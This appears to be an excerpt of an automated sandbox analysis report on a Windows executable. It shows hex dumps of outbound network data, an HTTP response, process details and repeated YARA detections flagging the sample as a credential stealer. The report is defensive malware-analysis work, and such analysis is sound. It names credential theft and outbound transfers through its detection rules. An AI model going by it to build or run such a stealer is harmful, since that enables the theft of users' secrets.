2024-10-27 20:06:26 UTC | 15331 | OUT | Data Raw: d2 70 60 1e 6e 1d 1d d5 74 56 e8 2e b5 20 bb 42 0a ec df 4f 51 14 a3 ac f1 81 23 7b d5 eb 83 f3 6f 29 77 89 0a ed c2 3c bf 9f 34 cf d2 1c 3e 2e 6d ee 9f 56 b2 f5 fb bf 42 6e e7 62 8c 72 6a e8 d0 cf f7 91 9c c2 a7 93 55 ef df 4a 05 08 79 72 d2 ab 6f d1 8d 2a 52 39 de 7d 61 b7 1f cd c9 0d 5c c9 a8 8e 19 9f b6 fb 22 c2 f1 4a 08 26 76 d1 c7 0e 85 24 a4 85 2b bb a2 c5 86 34 86 9a 7b f2 ca b0 12 e4 8d b5 5c 66 85 ad 5d be a7 d8 2f 15 6a 55 33 25 0d ad 03 eb fe 7b 7d 0f 26 4a 3f 49 c3 a1 6c dd 47 98 a6 a2 95 93 6f 25 17 c5 cf ef d2 5a 93 bc 94 48 3e 35 9c 37 5f 13 ca ad 50 e1 d0 0a 62 22 8c 52 dc 97 1f 59 50 4b b1 93 d2 f5 1e c6 a6 71 7b 1f 26 b4 87 ba 29 37 c5 92 90 0a 93 df 4c 02 3c 9c a4 0c 2f 5f d1 9b fe 25 31 f9 51 7b 93 5c 39 f9 f2 c9 37 b9 1b 15 1a 9b 8f
Data Ascii: p`ntV. BOQ#{o)w<4>.mVBnbrjUJyro*R9}a\"J&v$+4{\f]/jU3%{}&J?IlGo%ZH>57_Pb"RYPKq{&)7L</_%1Q{\97
2024-10-27 20:06:26 UTC | 15331 | OUT | Data Raw: 0e 9b 2b 03 17 77 96 0e dd 22 d1 8d d3 26 73 16 f9 81 23 aa 16 44 d6 1f ef cf 56 07 0c bf 1c 7a ff 20 f3 76 81 69 41 9e 6d 72 9b 18 56 05 04 47 5c bb 6c 66 5e 38 57 94 ef b5 45 9f c5 68 c5 6b 86 37 c5 5a 43 70 d7 42 1e 73 77 70 46 8a dd 80 2a ab d3 52 42 18 f3 1b 8b 7f 98 89 22 73 4d c5 05 d5 87 55 af 7e 4b a4 ca 83 fd 18 27 28 a3 0a 52 d3 c2 cc df 36 f7 5f 7b d5 8d 28 dc b4 b8 0f 61 cf 0d 04 d8 53 3e a4 de 6c 3b b2 74 8c c8 f5 bb 6d c6 a8 2f 10 f3 94 c6 c2 9f 48 f7 cf cf 8a c3 c2 12 fc d6 b8 2e 6e 1c c8 a3 55 f5 8b 39 33 fd 43 64 a4 c0 64 e8 26 97 ab 62 fb eb ff 19 1e 7a 0b d3 66 ba 18 bd 01 4c 51 c2 37 74 c5 9f fe 6f 71 fb f6 9f 80 be e7 7e 4b 6e 49 f5 9e a9 4d e6 b9 2d ed 6f ef 12 de ae d2 0e 06 e7 44 e2 b9 eb a6 99 47 c4 f6 70 dd d4 f9 95 bd 5f c1 3d
Data Ascii: +w"&s#DVz viAmrVG\lf^8WEhk7ZCpBswpF*RB"sMU~K'(R6_{(aS>l;tm/H.nU93Cdd&bzfLQ7toq~KnIM-oDGp_=
2024-10-27 20:06:26 UTC | 15331 | OUT | Data Raw: 82 49 10 69 54 18 e5 d6 0b 8e b9 46 7b 16 da ae 60 67 e2 81 bb 1b 84 cf 74 1d ce df f7 78 a3 e1 8c d6 92 fa 5c 49 b1 07 bf c0 9f 77 a4 4f 7e 47 1b a3 75 fd e7 1a ec 83 1e 49 25 09 8b fc de 9a a8 37 c1 f9 70 88 dc 74 63 cd 5c 4d d5 93 af 3b 68 ab e3 e5 1a bd b1 1d ae 78 fa e1 77 8a 25 7d dc b3 40 bc 75 ed ac a0 4d 9f 8a 5a 56 c6 f0 26 10 55 d1 b1 d2 ef 70 04 2f 6c d2 d9 27 0c 37 0f 8a 07 09 5c da ef 74 5e 98 bc e4 ca 3a bc 73 9d 08 fe 2a 78 a8 76 c3 41 23 19 41 02 bb 88 5f 4d 71 c4 cc aa b5 52 62 9c 6f 5d a0 e8 c4 29 ba 65 2b e6 f9 b1 b6 6f 12 d2 4c eb 0e d5 f8 d1 2d 4d 4f 0d 39 d4 64 2f 6d a2 2a b6 05 c7 64 75 3f 72 94 eb 57 97 15 d9 61 d3 4c cc 54 4e a5 b5 be 79 d8 14 61 d4 6d ef 09 4e 83 dc dd 75 0e ba 89 fd b6 59 0a bd 51 81 9c 3f 0d 62 26 52 0e ce e1
Data Ascii: IiTF{`gtx\IwO~GuI%7ptc\M;hxw%}@uMZV&Up/l'7\t^:s*xvA#A_MqRbo])e+oL-MO9d/m*du?rWaLTNyamNuYQ?b&R
2024-10-27 20:06:26 UTC | 15331 | OUT | Data Raw: 23 60 a9 49 2b 4b 0f 33 80 c3 5f 6c b5 7b b5 b7 ff 88 79 e1 0d 68 c8 c1 50 d5 c6 e5 0b 81 0f 22 a8 2a 06 d3 83 9f cf 4d 34 d6 9d bd ec 00 48 0e c1 11 a1 eb 47 c6 b3 e8 09 0d e4 29 c1 56 fc 3b 09 1a 52 d3 7d b9 f3 4f 13 1b cd 3e 31 e4 c8 c3 93 b6 63 8a fd 1d 4f 43 8f 5e 33 bb c2 dd 31 ad cc 08 2f 7e f7 24 9e 82 8d c0 c4 ac 9b 38 2b b9 d4 45 84 74 ef b9 57 24 b8 ed ae 7b 02 7c ec b0 91 5e 81 e6 08 66 24 c0 77 fa 0c 3e a6 dd a9 62 c3 47 90 d4 17 9e ac 8d 3c 5b 25 29 b7 31 ee 5e 9d 3c 0d 33 a3 e1 31 00 6e 8e 2a 66 28 a6 0d 12 92 39 f7 a3 8b fe 37 3d d4 0c 84 ac 77 c8 d2 96 9f 20 89 8c bf 8c 5b aa 16 13 a9 0f d3 44 3d cf ad be 72 b3 44 1c 38 70 e4 07 a5 72 e8 07 45 04 b0 96 a5 c0 bf fc ac 8e 7f f8 fd f7 01 4a 5b ef 79 e0 46 4f 0b a7 09 30 3e a4 15 22 ca fe 39
Data Ascii: #`I+K3_l{yhP"*M4HG)V;R}O>1cOC^31/~$8+EtW${|^f$w>bG<[%)1^<31n*f(97=w [D=rD8prEJ[yFO0>"9
2024-10-27 20:06:26 UTC | 15331 | OUT | Data Raw: b5 d1 66 e6 3f c9 4f 93 4e 77 06 19 3b aa 56 6a b4 4f 6d 2c 2c 4e 6c 7a 4f 70 16 39 3f 96 df ab 9e 8d 3a 77 fc 40 14 4d 49 bc da 8c 42 4f 34 b4 71 c5 88 b0 ff 1e c0 68 73 64 ef 62 dd 8d 3a 67 9f e8 73 d5 f4 7c 8e 0f 34 be f5 f3 b2 96 8d 30 3f 5a 2d a3 c2 03 e4 36 d9 c3 c7 ca a2 37 ac 07 15 cf 07 46 f8 0b ce 7e 91 c1 f2 df 3b 85 ed dc b7 97 91 a8 da 84 32 1d c3 dc 1b f8 22 3e 10 ce 57 98 1a 72 ae 6a 6e 16 cb b9 52 ab 39 06 2e a4 2d 72 8a d9 e8 31 5e a1 99 7b 14 5f 7c 8d 80 95 25 69 90 34 86 45 11 77 26 7a 79 8e ca b9 12 4e 1f 3b 37 48 51 54 22 51 14 33 14 db 93 6b 35 3f 6f 13 9c 3e 4b b3 b5 89 71 dd a5 32 6e f3 ed ab 9b d6 4f 53 3d 21 e2 94 da 4a 21 25 b1 91 bd b3 ca 45 36 74 cd e4 30 c5 47 90 54 ad 00 51 dd 66 91 32 6c 72 2e 8b d1 b9 4b 18 1b cf 75 4c 2d
Data Ascii: f?ONw;VjOm,,NlzOp9?:w@MIBO4qhsdb:gs|40?Z-67F~;2">WrjnR9.-r1^{_|%i4Ew&zyN;7HQT"Q3k5?o>Kq2nOS=!J!%E6t0GTQf2lr.KuL-
2024-10-27 20:06:26 UTC | 15331 | OUT | Data Raw: 31 58 64 fe 36 ab a7 ae e6 9f f1 5c 3e c4 9d c0 c4 35 64 13 06 c8 b3 9f de e7 39 79 55 a8 04 15 ce 9d 37 61 25 78 5e f8 f7 04 08 7d 76 76 7c 92 87 0e 7e 84 16 2c 69 21 ea 89 51 ff 3e 83 d2 c1 8e c7 9d 6a 2d 11 80 67 0f 46 e9 a5 14 aa 3f dd 6e 63 9f ed 1e e3 dd 47 ab d8 14 a8 39 95 88 11 7b 34 f2 fd f6 9a 9d b8 8d 2c 27 e9 13 c0 8f 94 d0 7f 0e 8a f7 21 32 d3 e2 15 fe b9 9f f4 f7 f7 44 e7 c0 13 e0 73 f6 73 ed 23 f3 b6 36 fa 9c c9 ba 79 9d e3 7b e8 3c a0 62 ab 1a fe f6 61 28 ef f1 09 27 29 1d ad bf 56 88 0d df 53 98 4c be 55 4f b6 fd 17 ca 79 d6 0e 37 65 21 eb 8a 42 5e 64 88 c6 bd fb 7d 4b 7f e9 ad 80 77 e9 e9 aa 81 09 9a 1e dd 09 b6 02 9f 73 fc d8 31 68 71 2c 0a 35 4f dd b1 d9 1a 8b b9 92 86 b9 de cc 70 08 75 16 bc 79 60 cb 65 64 ec 58 22 97 85 38 cf 1f b7
Data Ascii: 1Xd6\>5d9yU7a%x^}vv|~,i!Q>j-gF?ncG9{4,'!2Dss#6y{<ba(')VSLUOy7e!B^d}Kws1hq,5Opuy`edX"8
2024-10-27 20:06:26 UTC | 15331 | OUT | Data Raw: 20 81 30 d8 94 6d 14 6a 9c cc c9 d8 55 77 b3 2c 24 aa 41 99 aa 2e a8 ee bb f2 01 69 65 47 be 82 7d 93 a7 f6 4e 78 d0 5a d1 56 91 d5 cc bb db a9 ba 78 6b 32 df a1 d1 4f 2e 54 97 6a 58 be 89 a5 fb f1 97 c2 36 74 34 4d 46 45 2c fa bc f3 cb 8d 8c 02 e4 0c 5f 61 01 4a 1c 13 1b a1 80 e0 74 ce 64 c0 d4 09 ef cd 19 7d f8 9b 36 e1 b4 b4 1e f6 c2 1c 58 64 c8 d2 64 e0 54 34 02 2f 81 3c 28 8c 62 38 37 24 c4 c7 b9 a1 28 e1 41 49 bc 99 e7 89 bc eb da 23 82 05 1c fc 35 53 65 be 5a dd 49 ce cd 53 72 57 3e 60 52 af f1 80 b1 ab 2e 1c 21 84 89 d3 3d 38 d8 ef b0 a6 35 a5 e7 64 9d 56 77 43 55 6b 52 8d da 98 92 7c 4b 95 e9 3f 04 92 9a 7c 66 10 85 3d c5 45 36 03 c1 77 4f f6 be 88 e8 e5 72 f2 11 57 ba 71 46 13 e5 75 ef 7f 6b c0 ff 6c 76 cb 3f 80 17 6f 96 94 66 ed aa 4a 19 d0 36
Data Ascii: 0mjUw,$A.ieG}NxZVxk2O.TjX6t4MFE,_aJtd}6XddT4/<(b87$(AI#5SeZISrW>`R.!=85dVwCUkR|K?|f=E6wOrWqFuklv?ofJ6
2024-10-27 20:06:26 UTC | 15331 | OUT | Data Raw: 94 79 cf 70 f7 e6 a5 36 82 ca 16 45 9b 0e 47 51 a2 7c 4a 80 8f bf be 34 c1 d4 a0 81 6c 7e 2e 50 db c4 48 4a 88 b7 fb 11 f1 12 78 44 92 94 f9 a5 88 14 c7 41 ac 98 d4 24 d4 0f 67 ed bd 71 ad f8 94 36 a8 f3 0a c5 7b e3 83 3b aa b7 8d fb ed 2f 41 4a dc 42 15 09 69 a2 8d 01 bf cf 10 4e 40 48 70 4c 3e 7b 59 90 06 cf 91 93 0f 35 88 87 72 6a ec c3 43 fa dc a9 5c f3 e9 73 96 4f 09 c2 e0 be a5 dc 1e e5 03 70 06 16 bd 73 87 2f 71 d1 28 59 5c ac fb 06 db 51 7c fa c8 53 60 8a f2 9b dd 2e b8 8e d2 36 d1 3b 99 b2 77 8d 8d dd cb 8d b8 22 fa a6 00 88 f0 3c 7a 19 86 60 93 de c2 a6 07 70 6f 7f 2e 5d 32 e0 2e 21 1e 5d cd 3a 67 54 47 38 12 c3 93 55 d1 6e 16 32 83 68 10 f2 30 32 31 7e 2d d8 91 7c e8 3b 55 62 e2 40 c3 af 62 e2 b5 2c 0d ab d1 b4 bb 72 ef b1 8c e3 3f 5b b0 79 55
Data Ascii: yp6EGQ|J4l~.PHJxDA$gq6{;/AJBiN@HpL>{Y5rjC\sOps/q(Y\Q|S`.6;w"<z`po.]2.!]:gTG8Un2h021~-|;Ub@b,r?[yU
2024-10-27 20:06:28 UTC | 1017 | IN | HTTP/1.1 200 OK
Date: Sun, 27 Oct 2024 20:06:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=g982hvchelvclb8mh7emvlj14n; expires=Thu, 20 Feb 2025 13:53:07 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NyzeGR0Jv88a959A6isYmorTIQZyAvOy9L5tiUiI3kVo2SbALrTHtM1JpBNSlpwmUszyjiYLEQ8t8YFqM4G2rfO29OM2y%2F3%2Fm8OBSiZl%2FadYNCzKL3sd7JSZoJU%2BOJo5IWrr"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d954e804b5b7d54-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1781&sent=221&recv=614&lost=0&retrans=0&sent_bytes=2839&recv_bytes=571554&delivery_rate=1648264&cwnd=250&unsent_bytes=0&cid=866e1ad3ac6ffa5a&ts=1999&x=0"



Target ID:0
Start time:16:06:11
Start date:27/10/2024
Path:C:\Users\user\Desktop\file.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\file.exe"
Imagebase:0x490000
File size:3'029'504 bytes
MD5 hash:05B1942E139D61A022F421BDD45A33BB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2225779181.0000000001068000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2208047140.0000000001062000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2182520412.0000000001061000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2223528607.0000000001063000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2207678543.0000000001061000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2182548936.0000000001067000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2194155395.0000000001061000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:low
Has exited:true

Memory Dump Source
• Source File: 00000000.00000003.2225779181.0000000001068000.00000004.00000020.00020000.00000000.sdmp, Offset: 01068000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_1068000_file.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 397e5b0f88ca9fb19c7b4e6f8135ebc2af383973eaf7d0fb9db9f5b11abb3c98
• Instruction ID: b582a2dd180c5f9214037e80c75ccf27d8097ad9efa4d89fac84a8330f38d626
• Opcode Fuzzy Hash: 397e5b0f88ca9fb19c7b4e6f8135ebc2af383973eaf7d0fb9db9f5b11abb3c98
• Instruction Fuzzy Hash: BAB239A284E3D15FE3538B349C666927FB1AF13224B0E46DBD0C4CF0A3D25D4A5AC766